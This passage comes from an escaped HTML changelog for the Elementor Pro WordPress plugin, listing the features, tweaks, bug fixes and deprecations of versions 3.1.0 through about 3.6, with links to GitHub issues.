console in Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17036\\\">#17036<\\/a>)<\\/li>\\n<li>Fix: Autoplay is not working as expected when the lazy load is active in Video Playlist widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15304\\\">#15304<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16274\\\">#16274<\\/a>)<\\/li>\\n<li>Fix: Right navigation area wasn\'t 100% clickable in Post Navigation widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14252\\\">#14252<\\/a>)<\\/li>\\n<li>Fix: Posts duplicate when there are two Posts widgets inside a page using pagination functionality (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17056\\\">#17056<\\/a>)<\\/li>\\n<li>Fix: Global widget changes are not reflected on frontend (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16820\\\">#16820<\\/a>)<\\/li>\\n<li>Fix: JS Error console message when using the Load More functionality and Post Per Page option in Posts widget<\\/li>\\n<li>Fix: Heading styling is not being loaded when Inline CSS experiment is active in Post and Page Title widgets<\\/li>\\n<li>Fix: Sticky offset not working as expected when changing device mode on the browser<\\/li>\\n<li>Fix: Scroll Snap functionality wasn\'t applied on Templates and Archives<\\/li>\\n<li>Fix: Toggle icon color didn\'t work on hover state when Inline Font Icons experiment is activated in Nav Menu widget<\\/li>\\n<li>Fix: Variations style controls are not working as expected in WooCommerce Add to Cart widget<\\/li>\\n<li>Fix: Display conditions module is not working as expected when using the new Theme Builder UI<\\/li>\\n<li>Fix: Edit header handles <code>z-index<\\/code> issues in Header document<\\/li>\\n<li>Fix: Panel icons UI glitch in Call To Action widget<\\/li>\\n<li>Fix: WordPress 5.9 <code>WP_User_query<\\/code> <code>who<\\/code> argument deprecation adjustments<\\/li>\\n<\\/ul>\\n<h4>3.5.2 - 2021-11-28<\\/h4>\\n<ul>\\n<li>Tweak: Adjusted license mechanism to support trial period<\\/li>\\n<li>Fix: Updates made to Global Widgets do not reflect accordingly to linked widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16815\\\">#16815<\\/a>)<\\/li>\\n<li>Fix: Hamburger toggle button doesn\'t change to \\u201cclose\\u201d when menu is collapsed in Nav Menu widget when Inline Font Awesome experiment is active<\\/li>\\n<li>Fix: Global Widget cannot be unlinked<\\/li>\\n<\\/ul>\\n<h4>3.5.1 - 2021-11-10<\\/h4>\\n<ul>\\n<li>Fix: Inline HTML elements appear as plain text in Animated Headline widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16816\\\">#16816<\\/a>)<\\/li>\\n<li>Fix: Dropdown items inherited values from Main Menu space between control in Nav Menu widget (<a href=\\\"(https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16815)\\\">#16815<\\/a><\\/li>\\n<li>Fix: Order Summary titles style controls not applying on various devices in Cart widget<\\/li>\\n<li>Fix: Panel "Need Help" link is not correct in WooCommerce section in Site Settings<\\/li>\\n<\\/ul>\\n<h4>3.5.0 - 2021-11-01<\\/h4>\\n<ul>\\n<li>New: WooCommerce Checkout widget - Fully customize the content and style of your checkout page (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15282\\\">#15282<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15990\\\">#15990<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11014\\\">#11014<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13218\\\">#13218<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5383\\\">#5383<\\/a>)<\\/li>\\n<li>New: WooCommerce Cart widget - Style your cart page the way you want with design flexibility (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15282\\\">#15282<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11014\\\">#11014<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13218\\\">#13218<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5383\\\">#5383<\\/a>)<\\/li>\\n<li>New: WooCommerce My Account widget - Create a custom design for your my account pages (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11014\\\">#11014<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5383\\\">#5383<\\/a>)<\\/li>\\n<li>New: Progress Tracker widget - Motivate your customers to keep reading your site content (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16576\\\">#16576<\\/a>)<\\/li>\\n<li>New: Meet WooCommerce Site Settings - Set your store pages within Elementor<\\/li>\\n<li>Experiment: Scroll Snap - Set the scene of every scroll (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10752\\\">#10752<\\/a>)<\\/li>\\n<li>Tweak: Changed infrastructure to prevent rendering bugs in Global Widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16354\\\">#16354<\\/a>)<\\/li>\\n<li>Tweak: Added the option to open submission in a new tab in Form Submissions (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14967\\\">#14967<\\/a>)<\\/li>\\n<li>Tweak: Added various responsive controls in Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1851\\\">#1851<\\/a>)<\\/li>\\n<li>Tweak: Split Title and Price styling controls in Price List widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7688\\\">#7688<\\/a>)<\\/li>\\n<li>Tweak: Added various responsive capabilities to controls in Posts Archive widget<\\/li>\\n<li>Tweak: Adjusted Motion Effects module to support future feature<\\/li>\\n<li>Tweak: Changed admin notice content when Pro installed without Core installed<\\/li>\\n<li>Tweak: Cleanup in <code>wp_options<\\/code> table<\\/li>\\n<li>Tweak: Changed Connect logic in Elementor top bar to simplify the connect process<\\/li>\\n<li>Tweak: Marked new Theme Builder as an Experiment and set to default for new sites<\\/li>\\n<li>Tweak: Enforced better security policies in various widgets and modules<\\/li>\\n<li>Tweak: Added load more button functionality to the Posts Archive widget<\\/li>\\n<li>Tweak: Renamed Elementor\'s responsive SCSS variables<\\/li>\\n<li>Tweak: Added dividers to horizontal layout in Nav Menu widget<\\/li>\\n<li>Tweak: Removed Google+ social network from Share Buttons widget<\\/li>\\n<li>Tweak: Convert usage of old Responsive class to use the new Breakpoints Manager<\\/li>\\n<li>Fix: jQuery in Heading doesn\'t work for not logged in users in Custom Code (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14515\\\">#14515<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14266\\\">#14266<\\/a>)<\\/li>\\n<li>Fix: Menu animation causing page horizontal scroll in Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15184\\\">#15184<\\/a>)<\\/li>\\n<li>Fix: Wrong function call in Table of Content & Post Excerpt widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16547\\\">#16547<\\/a>)<\\/li>\\n<li>Fix: Slides to Scroll control can\'t be set to Default if Widescreen mode has a value in Testimonial Carousel widget<\\/li>\\n<li>Fix: Sticky offset not working properly when changing device mode<\\/li>\\n<li>Fix: UTF character issues when exporting CSV file in Form Submissions<\\/li>\\n<li>Fix: Load More functionality doesn\'t work when the Posts widget placed inside an Archive template<\\/li>\\n<li>Fix: UI glitches and editing issues in Video Playlist widget<\\/li>\\n<\\/ul>\\n<h4>3.4.2 - 2021-10-12<\\/h4>\\n<ul>\\n<li>Fix: Icons color style conflicts when Font-Awesome Inline experiment is active in Share Buttons widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16435\\\">#16435<\\/a>)<\\/li>\\n<li>Fix: Mini Cart hides page content when closed in Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16305\\\">#16305<\\/a>)<\\/li>\\n<li>Fix: UI glitches in the Editor edit mode when inserting Post Content widget and Font-Awesome Inline experiment is active in Single Post template (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16358\\\">#16358<\\/a>)<\\/li>\\n<li>Fix: Slides per view controls disappeared from multiple breakpoints in Testimonial Carousel<\\/li>\\n<li>Fix: Product variations UI glitch in Menu Cart widget<\\/li>\\n<li>Fix: Buttons UI glitch on Safari browser in Menu Cart widget<\\/li>\\n<\\/ul>\\n<h4>3.4.1 - 2021-09-01<\\/h4>\\n<ul>\\n<li>Fix: Sticky functionality is not working if the Additional Custom Breakpoints experiment is active (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16186\\\">#16186<\\/a>)<\\/li>\\n<li>Fix: Slideshow skin UI glitch in Media Carousel widget<\\/li>\\n<li>Fix: Product price typography weight control is not working as expected in Menu Cart widget<\\/li>\\n<\\/ul>\\n<h4>3.4.0 - 2021-09-01<\\/h4>\\n<ul>\\n<li>Tweak: Added new Mini Cart layout type in Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11312\\\">#11312<\\/a>)<\\/li>\\n<li>Tweak: Added styling options for Cart, Products, and Cart buttons in Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14952\\\">#14952<\\/a>)<\\/li>\\n<li>Tweak: Added the ability to open cart automatically when an item is added in Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14119\\\">#14119<\\/a>)<\\/li>\\n<li>Tweak: Added the ability to remove an item from cart without reloading the page with an AJAX request (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9531\\\">#9531<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10875\\\">#10875<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11309\\\">#11309<\\/a>)<\\/li>\\n<li>Tweak: Added Load More AJAX functionality to Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12126\\\">#12126<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1284\\\">#1284<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14557\\\">#14557<\\/a>)<\\/li>\\n<li>Tweak: Added Vimeo support to the Video Playlist widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15319\\\">#15319<\\/a>)<\\/li>\\n<li>Tweak: Improved asset loading performance by serving lighter JS files (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8572\\\">#8572<\\/a>)<\\/li>\\n<li>Tweak: Added query string to the URL only after the first video is played in Video Playlist widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15348\\\">#15348<\\/a>)<\\/li>\\n<li>Tweak: Added various layout options with more responsive controls and cart structure options in Menu Cart widget<\\/li>\\n<li>Tweak: Added the option to open the menu cart by click or hover in Menu Cart widget<\\/li>\\n<li>Tweak: Added the ability to choose a specific product to draw data from in WooCommerce Dynamic tags<\\/li>\\n<li>Tweak: Removed auto-scroll to the widget location when arriving from external URL in Video Playlist widget<\\/li>\\n<li>Tweak: Removed the Video Playlist widget from the Experiments list<\\/li>\\n<li>Tweak: Added descriptive error messages for MailChimp action after submit and on form submit in Forms widget<\\/li>\\n<li>Tweak: Added tooltip trigger None and Hover for link in Hotspot widget<\\/li>\\n<li>Tweak: Added responsive controls to Offset and Effects Offset in Sticky options<\\/li>\\n<li>Tweak: Added responsive control to Alignment in Testimonial Carousel widget<\\/li>\\n<li>Tweak: Adjusted Motion Effects module to support future feature<\\/li>\\n<li>Tweak: Added future compatibility to support better loading of <code>eicons<\\/code> font<\\/li>\\n<li>Tweak: Changed Rename Part title and button color in Theme Builder<\\/li>\\n<li>Fix: Products don\'t appear on the cart while editing in Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15451\\\">#15451<\\/a>)<\\/li>\\n<li>Fix: Videos always start muted in the Video Playlist widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15292\\\">#15292<\\/a>)<\\/li>\\n<li>Fix: Unnecessary spacing if submenu indicator is set to None in Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15365\\\">#15365<\\/a>)<\\/li>\\n<li>Fix: MailChimp double opt-in feature doesn\'t work in Forms widget<\\/li>\\n<li>Fix: Fetching MailChimp groups field blocks the loading of the rest of the fields in the Form widget<\\/li>\\n<li>Fix: Missing field IDs causes forms not to be sent in Forms widget<\\/li>\\n<li>Fix: Full Content Skin is not working properly when inserted twice on the same page in Posts widget<\\/li>\\n<li>Fix: Avoid Duplicates option doesn\'t exclude manual selections in Posts widget<\\/li>\\n<li>Fix: Submenu indicator alignment issue in Nav menu widget<\\/li>\\n<li>Fix: Query control deprecated message appears when debug mode is defined<\\/li>\\n<li>Fix: Tweet Button icon incorrect color and size when the icon is rendered as SVG in Blockquote widget<\\/li>\\n<li>Fix: Video icon size is not changing on Active state in Video Playlist widget<\\/li>\\n<li>Fix: Header icon color is not working in Table Of Content widget<\\/li>\\n<li>Fix: Icons style glitches when Font Awesome Inline experiment is active in Video Playlist widget<\\/li>\\n<li>Fix: Bullet markers are not visible on preview mode when Font Awesome Inline experiment is active in Table of Content widget<\\/li>\\n<li>Fix: UI Glitch when Font-Awesome Inline experiment is active in Price Table widget<\\/li>\\n<li>Fix: Submenu Indicator appears larger when Font Awesome Inline experiment is active in Nav Menu widget<\\/li>\\n<li>Fix: Part name is deleted when clicking on the "Change" Button without changing the name in Theme Builder<\\/li>\\n<li>Fix: Redundant pagination queries in the Editor<\\/li>\\n<li>Deprecated: Remove all usages of <code>ElementorUtils::get_create_new_post_url()<\\/code><\\/li>\\n<li>Deprecated: See all deprecations to this version in our <a href=\\\"https:\\/\\/developers.elementor.com\\/v3-4-planned-deprecations\\/\\\">Developers Deprecations Post<\\/a><\\/li>\\n<\\/ul>\\n<h4>3.3.8 - 2021-08-23<\\/h4>\\n<ul>\\n<li>Fix: Products grid width issue when adjusting columns and rows in Products widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16001\\\">#16001<\\/a>)<\\/li>\\n<li>Fix: Font Awesome Inline experiment causes icons glitch in Price Table widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16045\\\">#16045<\\/a>)<\\/li>\\n<li>Fix: reCAPTCHA v3 <code>z-index<\\/code> is lower than the Section\'s background color<\\/li>\\n<li>Fix: Style missing when Font Awesome inline experiment is active in Post Info widget<\\/li>\\n<li>Fix: Font Awesome icons were not loaded in Post Info widget<\\/li>\\n<li>Fix: Zero character can\'t be used as a placeholder in Number field in Form widget<\\/li>\\n<li>Fix: Carousels are not working properly in the Editor when Additional Custom Breakpoints experiment is active<\\/li>\\n<\\/ul>\\n<h4>3.3.7 - 2021-08-15<\\/h4>\\n<ul>\\n<li>Tweak: Added support for Additional Custom Breakpoints in Nav Menu widget<\\/li>\\n<li>Tweak: Added support for Additional Custom breakpoints in Motion Effects<\\/li>\\n<li>Fix: Columns didn\'t respond to changes in Gallery widget if Additional Custom Breakpoints Experiment is active<\\/li>\\n<\\/ul>\\n<h4>3.3.6 - 2021-08-10<\\/h4>\\n<ul>\\n<li>Tweak: Added support for future feature in Nav Menu widget<\\/li>\\n<li>Fix: WooCommerce responsive grid styles are not being reflected in Product Related widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15857\\\">#15857<\\/a>)<\\/li>\\n<li>Fix: WooCommerce responsive grid styles are not being reflected in Upsells widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15857\\\">#15857<\\/a>)<\\/li>\\n<li>Fix: WooCommerce responsive grid styles are not being reflected in Product Categories widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15857\\\">#15857<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.3.5 - 2021-08-01<\\/h4>\\n<ul>\\n<li>Fix: Responsive layout glitches in Products and Products Archive widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15773\\\">#15773<\\/a>)<\\/li>\\n<li>Fix: reCAPTCHA V3 integration conflict with required fields validation in Forms widget<\\/li>\\n<\\/ul>\\n<h4>3.3.4 - 2021-07-21<\\/h4>\\n<ul>\\n<li>Fix: Grid layout glitch in WooCommerce Products Archive widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15718\\\">#15718<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.3.3 - 2021-07-20<\\/h4>\\n<ul>\\n<li>Tweak: Added a descriptive message in Collect Submissions action after submit<\\/li>\\n<li>Tweak: Added future compatibility for Additional Custom Breakpoints for Pro widgets<\\/li>\\n<li>Fix: Some widget style breaks when Improved CSS Loading Experiment is active in certain cases (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15632\\\">#15632<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15683\\\">#15683<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15660\\\">#15660<\\/a>)<\\/li>\\n<li>Fix: Translation update keep appearing as available after install (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14297\\\">#14297<\\/a>)<\\/li>\\n<li>Fix: Wrong default icon color when using Font Awesome icons as inline SVG in Call to Action widget<\\/li>\\n<\\/ul>\\n<h4>3.3.2 - 2021-07-13<\\/h4>\\n<ul>\\n<li>Tweak: Updated plugin description<\\/li>\\n<li>Fix: MailChimp tags in form widget replaced existing tags (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11111\\\">#11111<\\/a>)<\\/li>\\n<li>Fix: Clicking videos from the items list in edit mode doesn\\u2019t initiate videos properly<\\/li>\\n<li>Fix: User unauthorized message when activated but not connected in Kit Library<\\/li>\\n<li>Fix: Carousel widgets did not support additional custom breakpoint responsive values<\\/li>\\n<li>Fix: Tab border is overridden by the Section background color in Video Playlist widget<\\/li>\\n<li>Fix: Widgets style breaks when Improved CSS Load experiment is active in a Single Page template and Post Content widget<\\/li>\\n<\\/ul>\\n<h4>3.3.1 - 2021-06-20<\\/h4>\\n<ul>\\n<li>Tweak: Added support for more Theme Builder display conditions in Export \\/ Import experiment<\\/li>\\n<li>Tweak: Adjusted License page heading structure for future feature<\\/li>\\n<li>Tweak: Adjusted Font Awesome icon for allowing support for future feature<\\/li>\\n<li>Fix: <code>frontend.min.js<\\/code> file size increased in Elementor Pro 3.3.0 (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15278\\\">#15278<\\/a>)<\\/li>\\n<li>Fix: Prevent conditions from being reset when object cache is enabled in site (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13299\\\">#13299<\\/a>)<\\/li>\\n<li>Fix: Custom Code publish modal responsiveness issues (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14519\\\">#14519<\\/a>)<\\/li>\\n<li>Fix: Populating fields with options programmatically doesn\'t appear in Submissions screen (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10671\\\">#10671<\\/a>)<\\/li>\\n<li>Fix: Large images are not shown on the Image Carousel widget when set via Toolset dynamic tag<\\/li>\\n<li>Fix: Enable inline editing to the inner content tabs in Video Playlist widget<\\/li>\\n<li>Fix: Clicking on the video list doesn\'t play videos properly in Video Playlist widget<\\/li>\\n<li>Fix: Hide Play Icon control when Image overlay is toggled off in Video Playlist widget<\\/li>\\n<li>Fix: Removed extra space below the player when viewing from mobile view in Video Playlist widget<\\/li>\\n<li>Fix: Import button is not working properly in Theme Builder interface<\\/li>\\n<li>Fix: Preview Dynamic Content as control is not updating preview and throws an error in Popup Builder<\\/li>\\n<\\/ul>\\n<h4>3.3.0 - 2021-06-08<\\/h4>\\n<ul>\\n<li>New: Video Playlist widget - Add Engaging Video Content to Your Website (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11859\\\">#11859<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7803\\\">#7803<\\/a>)<\\/li>\\n<li>New: Hotspot widget - Create Interactive Images With Contextually Relevant Information (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7282\\\">#7282<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2768\\\">#2768<\\/a>)<\\/li>\\n<li>Tweak: Accessibility improvements for sub-menus in Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13859\\\">#13859<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13810\\\">#13810<\\/a>)<\\/li>\\n<li>Tweak: MailChimp action after submit can now add new tags to existing subscribers in Forms widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11111\\\">#11111<\\/a>)<\\/li>\\n<li>Tweak: Added <code>elementor_pro\\/forms\\/record\\/actions_before<\\/code> to filter the record before it sent to Actions After Submit in Forms widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14261\\\">#14261<\\/a>)<\\/li>\\n<li>Tweak: Yoast SEO breadcrumbs widget can be used in Elementor without the need of enabling them in Yoast setting<\\/li>\\n<li>Tweak: Added future support for widgets CSS conditional loading (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10329\\\">#10329<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14229\\\">#14229<\\/a>)<\\/li>\\n<li>Tweak: Added future support for Sticky JS library conditional loading<\\/li>\\n<li>Tweak: Added future support for Import \\/ Export experiment<\\/li>\\n<li>Tweak: Preparations and fixes for Import Export Experiment in Pro version<\\/li>\\n<li>Tweak: Added gradient button capabilities to Login widget buttons<\\/li>\\n<li>Tweak: Added gradient button capabilities to Slides widget button<\\/li>\\n<li>Tweak: Added gradient button capabilities to Price Table widget button<\\/li>\\n<li>Tweak: Added gradient button capabilities to Flip Box widget button<\\/li>\\n<li>Tweak: Added Code Highlight widget Developers Documentation<\\/li>\\n<li>Tweak: Adjusted Submissions page for future updates<\\/li>\\n<li>Tweak: Added <code>em<\\/code> and <code>%<\\/code> units for padding control in Carousel widgets<\\/li>\\n<li>Tweak: Shorten currency name to currency symbol in PayPal button widget<\\/li>\\n<li>Fix: Custom Fonts URLs should be replaced when replace URL is triggered (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7376\\\">#7376<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10382\\\">#10382<\\/a>)<\\/li>\\n<li>Fix: The currency symbol size changed in the Price Table widget if enabling sale (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13519\\\">#13519<\\/a>)<\\/li>\\n<li>Fix: Nav Menu widget is not loading Font Awesome submenu icons (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9907\\\">#9907<\\/a>)<\\/li>\\n<li>Fix: Hamburger toggle is not working in Nav menu widget<\\/li>\\n<li>Fix: Activation bug for IDN domains<\\/li>\\n<li>Fix: Conditions modal responsive glitches in Custom Code<\\/li>\\n<li>Fix: Duplicated strings in Custom Code module<\\/li>\\n<li>Fix: Enable resize option for code input field in Custom Code<\\/li>\\n<li>Fix: \\u201cSave & Close \\u201cbutton in Custom Code\'s Conditions modal was not visible on small screen sizes<\\/li>\\n<li>Fix: Removing a column from a section in the navigator resulted in an empty section<\\/li>\\n<li>Fix: Recommend option is cut If the layout is not "Standard" in the Facebook Button widget<\\/li>\\n<li>Fix: Video item does not play without adding an image in Media Carousel widget<\\/li>\\n<li>Fix: <code>search-plus<\\/code> icon missing from panel in Media Carousel widget<\\/li>\\n<li>Fix: UI hover state glitch in Media Carousel widget<\\/li>\\n<li>Fix: PHP notice was thrown when trying to import a kit without overrideConditions parameter in Kit Import flow<\\/li>\\n<li>Fix: Templates conditions not imported if there are no conflicts in Import Export Experiment<\\/li>\\n<li>Fix: Non english values are not encoded properly on Submissions export<\\/li>\\n<li>Fix: Theme Builder import is not working properly<\\/li>\\n<li>Fix: UI glitch when no global widgets were found in Editor Panel<\\/li>\\n<li>Deprecated: See all deprecations to this version in our <a href=\\\"https:\\/\\/developers.elementor.com\\/v3-3-planned-deprecations\\/\\\">Developers Deprecations Post<\\/a><\\/li>\\n<\\/ul>\\n<h4>3.2.2 - 2021-05-05<\\/h4>\\n<ul>\\n<li>Tweak: Added support for Expert tier templates in Templates Library<\\/li>\\n<li>Tweak: Updated compatibility tag to support Elementor v3.2.x<\\/li>\\n<li>Tweak: Added compatibility for future Library improvements<\\/li>\\n<li>Fix: Toolset image dynamic field is not working with Gallery widget<\\/li>\\n<\\/ul>\\n<h4>3.2.1 - 2021-03-21<\\/h4>\\n<ul>\\n<li>Tweak: Added strings context in PayPal button and Price Table widgets<\\/li>\\n<li>Tweak: Added support for future Import \\/ Export Kit feature<\\/li>\\n<li>Fix: Submissions with over than 191 characters weren\'t indexed properly<\\/li>\\n<\\/ul>\\n<h4>3.2.0 - 2021-03-14<\\/h4>\\n<ul>\\n<li>New: PayPal Button widget - Collect PayPal payments directly from your site<\\/li>\\n<li>Experiment: Submissions - Save all of your form submissions in one place (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1686\\\">#1686<\\/a>)<\\/li>\\n<li>Tweak: Added Stay In Column option to Inner Section element (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7956\\\">#7956<\\/a>)<\\/li>\\n<li>Tweak: Adjusted \'Max Height\' control range in Table of Contents widget<\\/li>\\n<li>Tweak: Changed descriptive text in Create Custom Code screen<\\/li>\\n<li>Tweak: Added support for dynamic capabilities in Code Highlight widget<\\/li>\\n<li>Tweak: Added support for future load on demand for <code>share-link<\\/code> library<\\/li>\\n<li>Tweak: Added support for future load on demand for <code>dialog<\\/code> library in Popup<\\/li>\\n<li>Tweak: Allow overwriting the assets URL when using a mirror domain<\\/li>\\n<li>Fix: Animation was triggered multiple times when accessing the viewport in certain cases in Animated Headline widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13951\\\">#13951<\\/a>)<\\/li>\\n<li>Fix: Location is not being updated after a Custom Code snippet is published (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13971\\\">#13971<\\/a>)<\\/li>\\n<li>Fix: Custom Fonts CSS files were not updated after regenerating CSS files<\\/li>\\n<li>Fix: Conditions modal is not responsive in Custom Code<\\/li>\\n<li>Fix: Empty order buttons are displayed in Custom Fonts screen<\\/li>\\n<li>Fix: Typo in \'Reply To\' Email action after submit placeholder in Forms widget<\\/li>\\n<li>Fix: Unnecessary Save Draft button in Custom Code<\\/li>\\n<li>Fix: RTL glitches in Custom Code<\\/li>\\n<li>Fix: Sanitized options in the editor to enforce better security policies<\\/li>\\n<li>Deprecated: See all deprecations to this version in our (<a href=\\\"https:\\/\\/developers.elementor.com\\/v3-2-planned-deprecations\\/\\\">Developers Deprecations Post<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.1.1 - 2021-02-23<\\/h4>\\n<ul>\\n<li>Tweak: Adjusted \'Max Height\' control range in Table of Contents widget<\\/li>\\n<li>Fix: Popup event handler is undefined (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11475]\\\">#11475<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10690\\\">#10690<\\/a>)<\\/li>\\n<li>Fix: Conditions modal is not responsive in Custom Code<\\/li>\\n<li>Fix: RTL glitches in Code Highlight widget<\\/li>\\n<li>Fix: Minor UI glitches in Code Highlight widget<\\/li>\\n<li>Fix: Users can\'t get Pro Developer Edition version updates<\\/li>\\n<\\/ul>\\n<h4>3.1.0 - 2021-02-13<\\/h4>\\n<ul>\\n<li>New: Introducing Custom Code - Add custom code snippets to your site, including <code>head<\\/code>, <code>body<\\/code> start and <code>body<\\/code> end<\\/li>\\n<li>New: Meet Code Highlight widget - showcase any syntax with highlighted UI (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5815\\\">#5815<\\/a>)<\\/li>\\n<li>Experiment: Improved Pro widgets performance by loading JS and Swiper assets conditionally in frontend (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8572\\\">#8572<\\/a>, <a href=\\\"https:\\/\\/developers.elementor.com\\/experiment-optimized-asset-loading\\/\\\">Developer Documentation<\\/a>)<\\/li>\\n<li>Tweak: Added Compatibility Tag support in Elementor Pro (<a href=\\\"https:\\/\\/developers.elementor.com\\/compatibility-tag\\/\\\">Developer Documentation<\\/a>)<\\/li>\\n<li>Tweak: Added Dynamic capabilities to Rotating Text animation in Animated Headline widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4625\\\">#4625<\\/a>, <a 